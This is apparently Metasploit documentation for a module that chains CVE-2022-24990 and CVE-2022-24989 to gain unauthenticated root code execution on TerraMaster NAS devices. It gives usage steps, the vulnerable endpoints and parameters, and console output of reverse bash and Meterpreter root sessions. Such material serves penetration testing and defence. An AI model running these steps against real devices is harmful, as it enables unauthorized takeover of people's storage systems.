## Vulnerable Application

This module combines [CVE-2022-24990: Leaking sensitive information](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24990) and
[CVE-2022-24989: Authenticated remote code execution](https://www.redpacketsecurity.com/terramaster-tos-command-execution-cve-2022-24989/)
to achieve an unauthenticated RCE by exploiting vulnerable endpoint `api.php?mobile/webNasIPS` leaking sensitive information such as
admin password hash and mac address to achieve unauthenticated access and use the vulnerable endpoint `api.php?mobile/createRaid` with
`POST` parameters `raidtype` / `diskstring` to execute remote code as root on TerraMaster NAS devices.

All TerraMaster devices running TerraMaster Operating System (TOS) `4.2.29` or lower are vulnerable.

Installing a vulnerable test bed requires a TerraMaster NAS device that can run `TOS 4.x`
This module has been tested against a TerraMaster `F2-221` Model with the specifications listed below:

* TerraMaster F2-221
* CPU: `x86`
* TOS Version: `4.2.08`

## Verification Steps

1. `use exploit/linux/http/terramaster_unauth_rce_cve_2022_24990`
1. `set RHOSTS <TARGET HOSTS>`
1. `set RPORT <port>`
1. `set LHOST <attacker host ip>`
1. `set LPORT <attacker host port>`
1. `set TARGET <0-Unix command or 1-Linux Dropper>`
1. `exploit`
1. You should get a `bash` shell or `meterpreter` session depending on the `target` and `payload` settings.

## Options
No specific options.

## Scenarios

```
msf exploit(linux/http/terramaster_unauth_rce_cve_2022_24990) > info

       Name: TerraMaster TOS 4.2.29 or lower - Unauthenticated RCE chaining CVE-2022-24990 and CVE-2022-24989
     Module: exploit/linux/http/terramaster_unauth_rce_cve_2022_24990
   Platform: Unix, Linux
       Arch: cmd, php, x64, x86, aarch64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2022-03-07

Provided by:
  h00die-gr3y <h00die.gr3y@gmail.com>
  Octagon Networks
  0xf4n9x

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   Unix Command
      1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.h
                                        tml
  RPORT      8181             yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Path to Terramaster Web console
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host


  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0
                                      .0.0 to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.

Payload information:

Description:
  This module exploits an unauthenticated remote code execution vulnerability in TerraMaster TOS 4.2.29
  and lower by chaining two existing vulnerabilities, CVE-2022-24990 "Leaking sensitive information"
  and CVE-2022-24989, "Authenticated remote code execution".
  Exploiting vulnerable endpoint `api.php?mobile/webNasIPS` leaking sensitive information such as admin password
  hash and mac address, the attacker can achieve unauthenticated access and use another vulnerable endpoint
  `api.php?mobile/createRaid` with POST parameters `raidtype` and `diskstring` to execute remote code as root
  on TerraMaster NAS devices.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2022-24990
  https://nvd.nist.gov/vuln/detail/CVE-2022-24989
  https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/
  https://github.com/0xf4n9x/CVE-2022-24990
  https://attackerkb.com/topics/h8YKVKx21t/cve-2022-24990


View the full module info with the info -d command.
```

### TerraMaster F2-221 TOS 4.2.08 - Unix Command `cmd/unix/reverse_bash` session
```
msf exploit(linux/http/terramaster_unauth_rce_cve_2022_24990) > set target 0
target => 0
msf exploit(linux/http/terramaster_unauth_rce_cve_2022_24990) > exploit

[*] Started reverse TCP handler on 192.168.10.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. TOS version is 4.2.08 and CPU architecture is X64.
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 1 opened (192.168.10.1:4444 -> 192.168.10.2:54556) at 2023-06-10 12:31:22 +0000

uname -a
Linux TerrorMaster 4.13.16 SMP Mon Jun 10 14:32:13 CET 2023 x86_64 GNU/Linux
id
uid=0(root) gid=0(root) groups=0(root)
```
### TerraMaster F2-221 TOS 4.2.08 - Linux Dropper `linux/x64/meterpreter/reverse_tcp` session
```
msf exploit(linux/http/terramaster_unauth_rce_cve_2022_24990) > set target 1
target => 1
msf exploit(linux/http/terramaster_unauth_rce_cve_2022_24990) > exploit

[*] Started reverse TCP handler on 192.168.10.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. TOS version is 4.2.08 and CPU architecture is X64.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Sending stage (3045348 bytes) to 127.0.0.1
[*] Meterpreter session 2 opened (192.168.10.1:4444 -> 192.168.10.2:46174) at 2023-06-10 12:39:01 +0000
[*] Command Stager progress - 100.00% done (810/810 bytes)

meterpreter > sysinfo
Computer     : 192.168.10.2
OS           :  (Linux 4.13.16)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter >
```

## Limitations
No limitations.
